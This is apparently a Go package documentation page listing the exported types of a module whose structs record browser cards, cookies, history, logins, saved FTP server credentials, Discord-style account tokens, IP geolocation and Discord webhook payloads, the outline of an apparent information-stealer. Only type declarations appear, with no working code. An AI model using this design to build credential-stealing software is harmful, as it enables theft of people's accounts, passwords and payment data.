Versions in this module Expand all Collapse all v0 v0.1.0 Dec 31, 2021 Changes in this version + func HandleErr(err error) + type CardStruct struct + Browser string + EncryptedValue []byte + ExpirationMonth string + ExpirationYear string + Name string + Value string + type CookieStruct struct + Browser string + EncryptedValue []byte + Host string + Name string + Path string + Value string + type EmbedAuthor struct + Name string + type EmbedField struct + Inline bool + Name string + Value string + type EmbedFooter struct + IconURL string + Text string + type EmbedImage struct + URL string + type EmbedThumbnail struct + URL string + type HistoryStruct struct + Browser string + LastVisit time.Time + Title string + Url string + VisitCount int + type IPStruct struct + City string + Country string + CountryCode string + IP string + ISP string + Latitude float64 + Longitude float64 + Region string + type LoggedCards struct + Logged []CardStruct + type LoggedCookies struct + Logged []CookieStruct + type LoggedHistory struct + Logged []HistoryStruct + type LoggedLogins struct + Logged []LoginStruct + type LoginStruct struct + Browser string + EncryptPass []byte + EncryptUser []byte + Password string + Url string + Username string + type RecentServerList struct + AllServers Servers + XMLName xml.Name + type SavedServers struct + Servers map[int][]Server + type Server struct + Host string + Keyfile string + Pass string + Port string + User string + type Servers struct + Servers []Server + type SiteManagerList struct + AllServers Servers + XMLName xml.Name + type UserStruct struct + Discriminator string + Email string + ID string + Phone string + Token string + Username string + Verified bool + type WebhookData struct + AvatarURL string + Embeds []*WebhookEmbed + Username string + type WebhookEmbed struct + Author *EmbedAuthor + Colour int + Fields []*EmbedField + Footer *EmbedFooter + Image *EmbedImage + Thumbnail *EmbedThumbnail + Timestamp string + URL string